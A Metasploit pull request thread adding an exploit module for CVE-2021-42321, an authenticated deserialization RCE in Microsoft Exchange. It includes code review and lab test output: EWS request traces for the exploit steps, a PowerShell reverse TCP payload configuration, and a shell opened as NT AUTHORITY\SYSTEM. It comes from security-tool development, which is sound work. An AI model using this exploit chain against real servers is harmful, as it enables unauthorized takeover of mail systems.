Create Module For CVE-2021-42321 - Exchange ChainedSerializationBinder Blacklist Typo Authenticated RCE
rapid7/metasploit-framework pull request #16164
Opened 2022-02-10 01:43 UTC by gwillcox-r7

This vulnerability allows remote attackers to execute arbitrary code on Exchange Server 2019 CU10 prior to Security Update 3, Exchange Server 2019 CU11 prior to Security Update 2, Exchange Server 2016 CU21 prior to Security Update 3, and Exchange Server 2016 CU22 prior to Security Update 2.

Note that authentication is required to exploit this vulnerability.

The specific flaw exists due to the fact that the blacklist for `ChainedSerializationBinder` had a typo whereby an 
entry was set as `System.Security.ClaimsPrincipal` instead of the proper value of `System.Security.Claims.ClaimsPrincipal`.

By leveraging this vulnerability, attackers can bypass the `ChainedSerializationBinder`'s deserialization blacklist
and execute code as `NT AUTHORITY\SYSTEM`.

Tested against Exchange Server 2019 CU11 SU0 on Windows Server 2019.

## Verification

I'll update this soon, but right now I'm still in the process of porting this over from a script into Metasploit. Directions to come when this is done.

### Stuff to update later :P

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] `use exploit/windows/smb/ms08_067_netapi`
- [ ] ...
- [ ] **Verify** the thing does what it should
- [ ] **Verify** the thing does not do what it should not
- [ ] **Document** the thing and how it works ([Example](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/post/multi/gather/aws_keys.md))

2022-02-10 17:34 UTC, jmartin-r7 commented on modules/exploits/windows/http/exchange_chainedserializationbinder_blacklist_typo_rce.rb
> +    end
```suggestion
   vuln_builds.each do |version_range|
      prepend_range = version_range[0].canonical_segments[..-2]
      lowest_patch = version_range[0].canonical_segments.last
      while Rex::Version.new((prepend_range.dup << lowest_patch).join('.')) <= version_range[1]
        res = send_request_cgi(
          'method' => 'GET',
          'uri' => normalize_uri(target_uri.path, "/ecp/#{build}/exporttool/")
        )

        unless res
          return CheckCode::Unknown('Target did not respond to check.')
        end

        if res && res.code == 200
          return CheckCode::Appears("Exchange Server #{build} is a vulnerable build.")
        end
        lowest_patch += 1
      end
    end
```

2022-02-11 19:59 UTC, gwillcox-r7 commented on modules/exploits/windows/http/exchange_chainedserializationbinder_blacklist_typo_rce.rb
> +    end
Implementation added in https://github.com/rapid7/metasploit-framework/pull/16164/commits/4c1b2478fa50bb6f0a6bd82ecd02acff5094d094, thanks @jmartin-r7 for the advice on this one!

2022-02-11 20:01 UTC, gwillcox-r7 commented on modules/exploits/windows/http/exchange_chainedserializationbinder_blacklist_typo_rce.rb
> +				  <t:Value>9222999999999999999</t:Value>
Note this can be randomized, however there appears to be a bug with Rex and big numbers at the moment that makes it hang when trying to generate any random number of this size, which is why this has not been randomized right now.

2022-02-11 20:02 UTC, gwillcox-r7 commented on modules/exploits/windows/http/exchange_chainedserializationbinder_blacklist_typo_rce.rb
> +  def check
Most of this method as per @jmartin-r7's reference could likely be mixin code, just haven't gotten around to doing this quite yet.

2022-02-11 20:19 UTC, gwillcox-r7 commented on modules/exploits/windows/http/exchange_chainedserializationbinder_blacklist_typo_rce.rb
> +				  <t:Value>9222999999999999999</t:Value>
Ignore the outdated part, this comment was made before I had to Rubocop everything to remove tabs 😅

2022-02-11 23:28 UTC, gwillcox-r7 commented on modules/exploits/windows/http/exchange_chainedserializationbinder_blacklist_typo_rce.rb
> +				  <t:Value>9222999999999999999</t:Value>
Fixed in https://github.com/rapid7/metasploit-framework/pull/16164/commits/1a3f161ec03d23577c29614c57464dc0d2b15cbf

2022-02-14 21:51 UTC, smcintyre-r7 requested changes
Can we change or remove all instances of the word "blacklist" for something more inclusive such as denylist? The module itself could simply be `exchange_chainedserializationbinder_typo`.

2022-02-14 21:51 UTC, smcintyre-r7 commented on modules/exploits/windows/http/exchange_chainedserializationbinder_blacklist_typo_rce.rb
> +  include Msf::Exploit::Remote::HttpClient
So you're including this mixin but you're not really using it. That means there's alot of datastore options that are registered that are not actually doing anything. Is there a reason you need to use the direct Rex client instead of the `send_request_cgi` method from the mixin? If it's for the authentication, can you not override the `#connect` method or update the mixin itself so the preferred method could be passed in? It looks like a lot of exception handling code could be removed if the mixin methods were used.

If you needed it for the NTLM authentication, did you try also setting the HttpUsername and HttpPassword options to the same values as USERNAME and PASSWORD? IIRC that's how basic auth works and should be how NTLM auth would also work.

2022-02-14 21:51 UTC, smcintyre-r7 commented on modules/exploits/windows/http/exchange_chainedserializationbinder_blacklist_typo_rce.rb
> +        'Arch' => [ARCH_CMD],
Can we add targets that deliver native payloads through either Powershell or the Command stager?

You'd define your targets like [this](https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/http/sharepoint_ssi_viewstate.rb#L51) then dispatch like [`this`](https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/http/sharepoint_ssi_viewstate.rb#L163). It seems like a good fit here since you don't actually need more that one target definition for the different versions of Exchange.

Also note that it's really not necessary to set the default payload. Module authors tend to add their favorite one but it just ends up overriding the framework-wide defaults which leads to inconsistent default values.

2022-02-14 21:51 UTC, smcintyre-r7 commented on modules/exploits/windows/http/exchange_chainedserializationbinder_blacklist_typo_rce.rb
> +            ACCOUNT_LOCKOUTS
Is this because you login? Seems reasonable to leave it out. It should be intuitive that if the user runs the module over and over again with bad credentials that they run the risk of locking out the account. A single module run however wouldn't trigger it unless there were prior failed attempts that put the counter at the threshold.

2022-02-14 21:51 UTC, smcintyre-r7 commented on modules/exploits/windows/http/exchange_chainedserializationbinder_blacklist_typo_rce.rb
> +  def check
If you do end up moving this into a mixin method, it should just return the version. Then the user can compare it however they'd like. That'd make it so this bit wouldn't need to be copy-pasted three times:

```
      if vuln_builds.any? { |build_range| Rex::Version.new(build).between?(*build_range) }
        return CheckCode::Appears("Exchange Server #{build} is a vulnerable build.")
      else
        return CheckCode::Safe("Exchange Server #{build} is not a vulnerable build.")
      end
```

2022-02-14 21:51 UTC, smcintyre-r7 commented on modules/exploits/windows/http/exchange_chainedserializationbinder_blacklist_typo_rce.rb
> +    xml_getfolder = Nokogiri::XML(res.body)
```suggestion
xml_getfolder = res.get_xml_document
```

2022-02-14 21:57 UTC, gwillcox-r7 commented on modules/exploits/windows/http/exchange_chainedserializationbinder_blacklist_typo_rce.rb
> +            ACCOUNT_LOCKOUTS
Yeah that was why I included it, wasn't sure though so I'll remove it based on what you mentioned here.

2022-02-14 22:37 UTC, jmartin-r7 commented on modules/exploits/windows/http/exchange_chainedserializationbinder_blacklist_typo_rce.rb
> +  def check
One discussed idea, is to considered having the `mixin` contain a default version list do be able to detect any version and optionally pass in a vulnerable version list when more targeted detection makes sense. Returning the version detected version makes sense to allow module writers to build out different paths if a vulnerability has different action paths depending on version. This would be make less noise and make it possible to be more selective about version testing.

2022-02-14 23:40 UTC, gwillcox-r7 commented on modules/exploits/windows/http/exchange_chainedserializationbinder_blacklist_typo_rce.rb
> +    xml_getfolder = Nokogiri::XML(res.body)
Fixed in https://github.com/rapid7/metasploit-framework/pull/16164/commits/c49591cf11aff8bc9839d7aedb1389a46ad2cc88

2022-02-14 23:40 UTC, gwillcox-r7 commented on modules/exploits/windows/http/exchange_chainedserializationbinder_blacklist_typo_rce.rb
> +            ACCOUNT_LOCKOUTS
Fixed in https://github.com/rapid7/metasploit-framework/pull/16164/commits/c49591cf11aff8bc9839d7aedb1389a46ad2cc88

2022-02-14 23:41 UTC, gwillcox-r7 commented on modules/exploits/windows/http/exchange_chainedserializationbinder_blacklist_typo_rce.rb
> +        'Arch' => [ARCH_CMD],
Fixed in https://github.com/rapid7/metasploit-framework/pull/16164/commits/c49591cf11aff8bc9839d7aedb1389a46ad2cc88 and now we can support using a lot more payloads. 

Still need to update the documentation so leaving this open until I do that.

2022-02-15 15:44 UTC, gwillcox-r7 commented on modules/exploits/windows/http/exchange_chainedserializationbinder_blacklist_typo_rce.rb
> +  include Msf::Exploit::Remote::HttpClient
Fixed with https://github.com/rapid7/metasploit-framework/pull/16164/commits/a7ace66b3f54bb3a88951d93adbeaeaa63eb98fa which updates this module to use the `HttpPassword` and `HttpUsername` options so that we can now use `send_request_cgi`. This also had the added benefit of simplifying a lot of the code.

2022-02-15 15:44 UTC, gwillcox-r7 commented on modules/exploits/windows/http/exchange_chainedserializationbinder_blacklist_typo_rce.rb
> +        'Arch' => [ARCH_CMD],
Documentation updated with https://github.com/rapid7/metasploit-framework/pull/16164/commits/a7ace66b3f54bb3a88951d93adbeaeaa63eb98fa, marking this as resolved.

2022-02-15 15:45 UTC, gwillcox-r7 commented
@msjenkins-r7 Test this please

2022-02-15 15:47 UTC, gwillcox-r7 commented
@msjenkins-r7 retest this please

2022-02-15 20:20 UTC, smcintyre-r7 reviewed
Alright so I'm running into an issue where it won't exploit a Server 2016 CU22 instance. Says it can't delete the existing user configuration.

<details>
<summary>Module Output</summary>

```
msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > show options 

Module options (exploit/windows/http/exchange_chainedserializationbinder_denylist_typo_rce):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   HttpPassword  Password1        yes       The password to use to authenticate to the Exchange server
   HttpUsername  aliddle          yes       The username to log into the Exchange server as
   Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS        192.168.159.42   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT         443              yes       The target port (TCP)
   SRVHOST       0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT       8080             yes       The local port to listen on.
   SSL           true             no        Negotiate SSL/TLS for outgoing connections
   SSLCert                        no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI     /                yes       Base path
   URIPATH                        no        The URI to use for this exploit (default is random)
   VHOST         WIN-BPID95ACQ7E  no        HTTP server virtual host


Payload options (cmd/windows/powershell_reverse_tcp):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   LHOST         192.168.159.128  yes       The listen address (an interface may be specified)
   LOAD_MODULES                   no        A list of powershell modules separated by a comma to download over the web
   LPORT         5555             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows Command


msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > set HttpTrace true
HttpTrace => true
msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > exploit

[*] Started reverse TCP handler on 192.168.159.128:5555 
[*] Running automatic check ("set AutoCheck false" to disable)
####################
# Request:
####################
GET /owa/service HTTP/1.1
Host: WIN-BPID95ACQ7E
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.44


####################
# Response:
####################
HTTP/1.1 302 Found
Content-Type: text/html; charset=utf-8
Location: https://win-bpid95acq7e/owa/auth/logon.aspx?url=https%3a%2f%2fwin-bpid95acq7e%2fowa%2fservice&reason=0
Server: Microsoft-IIS/10.0
request-id: 9c2066c8-6d4a-4c4a-847a-d32b9e9c77e2
X-OWA-Version: 15.1.2375.7
X-Powered-By: ASP.NET
X-FEServer: WIN-BPID95ACQ7E
Date: Tue, 15 Feb 2022 20:16:37 GMT
Content-Length: 223

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://win-bpid95acq7e/owa/auth/logon.aspx?url=https%3a%2f%2fwin-bpid95acq7e%2fowa%2fservice&amp;reason=0">here</a>.</h2>
</body></html>

[+] The target appears to be vulnerable. Exchange Server 15.1.2375.7 is a vulnerable build.
[*] Getting the user's inbox folder's ID and ChangeKey ID...
####################
# Request:
####################
POST /ews/exchange.asmx HTTP/1.1
Host: WIN-BPID95ACQ7E
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.44
Content-Type: text/xml; charset=utf-8
Content-Length: 692

<?xml version="1.0" encoding="utf-8"?>
    <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:m="http://schemas.microsoft.com/exchange/services/2006/messages" xmlns:t="http://schemas.microsoft.com/exchange/services/2006/types" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
      <soap:Header>
      <t:RequestServerVersion Version="Exchange2013" />
      </soap:Header>
      <soap:Body>
      <m:GetFolder>
        <m:FolderShape>
        <t:BaseShape>AllProperties</t:BaseShape>
        </m:FolderShape>
        <m:FolderIds>
        <t:DistinguishedFolderId Id="inbox" />
        </m:FolderIds>
      </m:GetFolder>
      </soap:Body>
    </soap:Envelope>
####################
# Response:
####################
HTTP/1.1 200 OK
Cache-Control: private
Transfer-Encoding: chunked
Content-Type: text/xml; charset=utf-8
Server: Microsoft-IIS/10.0
request-id: c94eed72-8764-4df7-b023-cc03f74dd418
X-CalculatedBETarget: win-bpid95acq7e.exchg.lan
X-DiagInfo: WIN-BPID95ACQ7E
X-BEServer: WIN-BPID95ACQ7E
X-AspNet-Version: 4.0.30319
Set-Cookie: exchangecookie=6c60584e5a3640c8afeb78453797d91a; expires=Wed, 15-Feb-2023 20:16:37 GMT; path=/; HttpOnly, X-BackEndCookie=S-1-5-21-2800676829-2777257591-1686523126-1602=u56Lnp2ejJqByMjJysfLz8rSzsjOx9LLm57J0seby8vSzc7KnpvIysvLnJ3IgYHNz83N0s/M0s7Iq83Pxc7JxczIgZqHnJeY0ZOekYHP; expires=Thu, 17-Mar-2022 20:16:37 GMT; path=/ews; secure; HttpOnly
Persistent-Auth: true
X-Powered-By: ASP.NET
X-FEServer: WIN-BPID95ACQ7E
Date: Tue, 15 Feb 2022 20:16:37 GMT

<?xml version="1.0" encoding="utf-8"?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Header><h:ServerVersionInfo MajorVersion="15" MinorVersion="1" MajorBuildNumber="2375" MinorBuildNumber="7" Version="V2017_07_11" xmlns:h="http://schemas.microsoft.com/exchange/services/2006/types" xmlns="http://schemas.microsoft.com/exchange/services/2006/types" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"/></s:Header><s:Body xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"><m:GetFolderResponse xmlns:m="http://schemas.microsoft.com/exchange/services/2006/messages" xmlns:t="http://schemas.microsoft.com/exchange/services/2006/types"><m:ResponseMessages><m:GetFolderResponseMessage ResponseClass="Success"><m:ResponseCode>NoError</m:ResponseCode><m:Folders><t:Folder><t:FolderId Id="AQMkADU1ADBhYjYzMi02MTQ3LTRlOTEtYjU1ADAtN2M0ZDBhYjYzODVlAC4AAAMhko4gUQEoR6mlLklj/zwrAQD9j/m9iNuTRpA5mrD5EV0AAAMBDAAAAA==" ChangeKey="AQAAABYAAAD9j/m9iNuTRpA5mrD5EV0AAAAACmbL"/><t:ParentFolderId Id="AQMkADU1ADBhYjYzMi02MTQ3LTRlOTEtYjU1ADAtN2M0ZDBhYjYzODVlAC4AAAMhko4gUQEoR6mlLklj/zwrAQD9j/m9iNuTRpA5mrD5EV0AAAMBCAAAAA==" ChangeKey="AQAAAA=="/><t:FolderClass>IPF.Note</t:FolderClass><t:DisplayName>Inbox</t:DisplayName><t:TotalCount>0</t:TotalCount><t:ChildFolderCount>0</t:ChildFolderCount><t:EffectiveRights><t:CreateAssociated>true</t:CreateAssociated><t:CreateContents>true</t:CreateContents><t:CreateHierarchy>true</t:CreateHierarchy><t:Delete>true</t:Delete><t:Modify>true</t:Modify><t:Read>true</t:Read><t:ViewPrivateItems>true</t:ViewPrivateItems></t:EffectiveRights><t:UnreadCount>0</t:UnreadCount></t:Folder></m:Folders></m:GetFolderResponseMessage></m:ResponseMessages></m:GetFolderResponse></s:Body></s:Envelope>
[+] ChangeKey value for Inbox folder is AQAAABYAAAD9j/m9iNuTRpA5mrD5EV0AAAAACmbL
[+] ID value for Inbox folder is AQMkADU1ADBhYjYzMi02MTQ3LTRlOTEtYjU1ADAtN2M0ZDBhYjYzODVlAC4AAAMhko4gUQEoR6mlLklj/zwrAQD9j/m9iNuTRpA5mrD5EV0AAAMBDAAAAA==
[*] Deleting the user configuration object associated with Inbox folder...
####################
# Request:
####################
POST /ews/exchange.asmx HTTP/1.1
Host: WIN-BPID95ACQ7E
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.44
Content-Type: text/xml; charset=utf-8
Content-Length: 843

<?xml version="1.0" encoding="utf-8"?>
    <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:m="http://schemas.microsoft.com/exchange/serv [...]

2022-02-15 22:14 UTC, gwillcox-r7 commented on modules/exploits/windows/http/exchange_chainedserializationbinder_denylist_typo_rce.rb
> +    end
Thanks for pointing this out, will address this now!

2022-02-16 00:19 UTC, gwillcox-r7 commented on modules/exploits/windows/http/exchange_chainedserializationbinder_denylist_typo_rce.rb
> +    end
Fixed in https://github.com/rapid7/metasploit-framework/pull/16164/commits/6700ed7f3c54e74651cbe01f81a5969c709e8171

2022-02-22 23:06 UTC, gwillcox-r7 commented
> 

So turns out this was occuring due to Server 2016 by default not having a configuration on the `Inbox` folder. I don't know if Server 2019 is different, but my logic in the code was wrong in that I falsely prevented the exploit from continuing if we couldn't delete a configuration on this folder, even if one didn't actually exist on the folder in reality.

The code will now instead print out a warning if the configuration doesn't exist and will continue to try make a configuration on this folder should the deletion fail. This will at least let users know that something may go wrong in case there is actually a legit configuration already applied, however if there is none, then we will just continue and create a configuration anyway.

2022-02-22 23:54 UTC, gwillcox-r7 commented
Cue updates and some more documentation updates, and this should now be working on Exchange 2016. Feel free to retest this @smcintyre-r7, hopefully should work now. Also updated the documentation to contain test cases for Exchange 2016 CU22 on Windows Server 2016 to showcase it working.

2022-02-24 15:53 UTC, smcintyre-r7 reviewed
Module is working great now on Exchange 2016 CU22. The only change I'm going to make is to remove the unnecessary default payloads that are specified. Once the tests pass then, I'll get this landed.

```
msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > run RHOSTS=https://192.168.159.42:443/ HttpUsername=aliddle HttpPassword=Password1

[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Exchange Server 15.1.2375.7 is a vulnerable build.
[*] Getting the user's inbox folder's ID and ChangeKey ID...
[+] ChangeKey value for Inbox folder is AQAAABYAAAD9j/m9iNuTRpA5mrD5EV0AAAAF2TzL
[+] ID value for Inbox folder is AQMkADU1ADBhYjYzMi02MTQ3LTRlOTEtYjU1ADAtN2M0ZDBhYjYzODVlAC4AAAMhko4gUQEoR6mlLklj/zwrAQD9j/m9iNuTRpA5mrD5EV0AAAMBDAAAAA==
[*] Deleting the user configuration object associated with Inbox folder...
[+] Successfully deleted the user configuration object associated with the Inbox folder!
[*] Creating the malicious user configuration object on the Inbox folder!
[+] Successfully created the malicious user configuration object and associated with the Inbox folder!
[*] Attempting to deserialize the user configuration object using a GetClientAccessToken request...
[*] Powershell session session 1 opened (192.168.159.128:4444 -> 192.168.159.42:12610 ) at 2022-02-24 10:51:28 -0500

PS C:\windows\system32\inetsrv> whoami
nt authority\system
PS C:\windows\system32\inetsrv>
```

2022-02-24 16:35 UTC, smcintyre-r7 approved these changes

2022-02-24 16:36 UTC, merged

2022-02-24 16:37 UTC, smcintyre-r7 commented
# Release Notes
This adds an exploit for CVE-2021-42321 which is an authenticated RCE in Microsoft Exchange. The vulnerability is related to a misconfigured deny-list that fails to properly prevent malicious serialized objects from being loaded, leading to code execution.